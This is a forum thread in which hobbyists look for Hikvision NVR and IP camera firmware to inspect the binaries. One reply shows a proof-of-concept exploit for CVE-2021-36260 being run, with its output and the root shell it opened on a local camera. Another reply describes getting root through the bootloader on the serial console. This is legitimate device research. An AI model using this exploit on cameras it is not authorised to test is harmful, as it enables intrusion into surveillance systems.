looking for hikvison firmware

[pdasterly]

i have nvr system based on hikvison, looking for firmware but i cant seem to find

NR32P6-16
V4.71.005 build 220801
C-R-K51-00

 

[okaylol]

+1 Looking for firmware for IP camera
Device Model: DS-2CD2183G2-IU
Firmware Version: V5.7.18 build 240826
or atleast a close firmware version. Want just the binaries to look at.

 

[alastairstevenson]

or atleast a close firmware version.

Fairly close at the bottom of here :

https://www.hikvision.com/uk/products/IP-Products/Network-Cameras/Pro-Series-EasyIP-/ds-2cd2183g2-iu/

 

[okaylol]

Fairly close at the bottom of here :

https://www.hikvision.com/uk/products/IP-Products/Network-Cameras/Pro-Series-EasyIP-/ds-2cd2183g2-iu/

Sorry, I should have been more clear. I want the unencrypted firmware/filesystem.

 

[alastairstevenson]

Sorry, I should have been more clear. I want the unencrypted firmware/filesystem.

Does it have to be that specific version of firmware?
Hikvision did quite a bit of fixing on it.
Earlier versions that have the @watchful_ip disclosed RCE vulnerability can be fully explored using @bashis PoC on a working camera which can be quite interesting.
For example :

alastair@PC-I5 ~/coding_stuff/bashis_disclosures $ ./Hikvision_CVE-2021-36260_RCE_POC.py --rhost 192.168.1.118 --shell
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
[*] Checking remote "192.168.1.118:80"
ETag: "5c3-258-5e79f070"
[!] Remote is verified exploitable
Remote "192.168.1.118" not pwned, pwning now!
[*] Trying SSH to 192.168.1.118 on port 1337


BusyBox v1.26.2 (2020-02-17 17:46:29 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# pwd
/
# prtHardInfo
Start at 1970-01-01 00:00:54
Serial NO S-2CD2347G2-LU20210414AAWRF81942659
V5.5.134 build 200430
NetProcess Version: 1.8.1.636956 [20:11:59-Mar 9 2020]
Db Encrypt Version: 131072
hardwareVersion = 0x0
hardWareExtVersion = 0x0
encodeChans = 1
decodeChans = 1
alarmInNums = 0
alarmOutNums = 0
ataCtrlNums = 0
flashChipNums = 0
ramSize = 0x200
networksNums = 1
language = 1
devType = 0x23290
net reboot count = 0
vi_type = 62
vi_type2 = 62
lens_type = 0
lens_type2 = 0
gps_info = 0
audioInSupport = 2
abfType = 0
firmwareCode = 0000000200000100000000010dc1bc6f000000010000000100000002ffffffff050500860014041e00023290
shieldSupport = 0
IRSupport = 10
bFillLightType2 = 0
Path: /Camera/Platform/Branches/branches_frontend_software_platform/IPC_develop_branch/ipc_baseline/G3_5.5.134_202003181903
Last Changed Rev: 839403
Last Changed Date: 2020-04-30 15:19:59 +0800 (Thu, 30 Apr 2020)


#

GitHub - Aiminsun/CVE-2021-36260: command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messa

command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by...

github.com

 

[alastairstevenson]

Sorry, I should have been more clear. I want the unencrypted firmware/filesystem.

If you have a working camera, another thing maybe worth trying is hooking up a serial TTL terminal to the console port, interrupt the bootloader, and try the 'upc' command.
Admittedly older firmware that what you are looking for, but on a couple of cameras I bought recently, upc left the console in a minsystem root shell with ash not psh so the flash contents were fully accessible.
Serial NO S-2CD2386G2-IU20210904AAWRG48463698
V5.5.800 build 210628

 

[okaylol]

If you have a working camera, another thing maybe worth trying is hooking up a serial TTL terminal to the console port, interrupt the bootloader, and try the 'upc' command.
Admittedly older firmware that what you are looking for, but on a couple of cameras I bought recently, upc left the console in a minsystem root shell with ash not psh so the flash contents were fully accessible.
Serial NO S-2CD2386G2-IU20210904AAWRG48463698
V5.5.800 build 210628

I'll give it whirl and let you know how it goes, thanks for this!

I've been trying to identify a remote code execution vulnerability, but this seems to be a good avenue to explore. I was going to follow this Youtube series, but he only got root access after soldering the chip on and off and modifying the firmware I would like the firmware to be somewhat latest, I don't care to change/modify the firmware just want to see how the binaries work. I've thought about downgrading the firmware to use CVE-2021-36260, but I'm afraid it's going to be too out of date.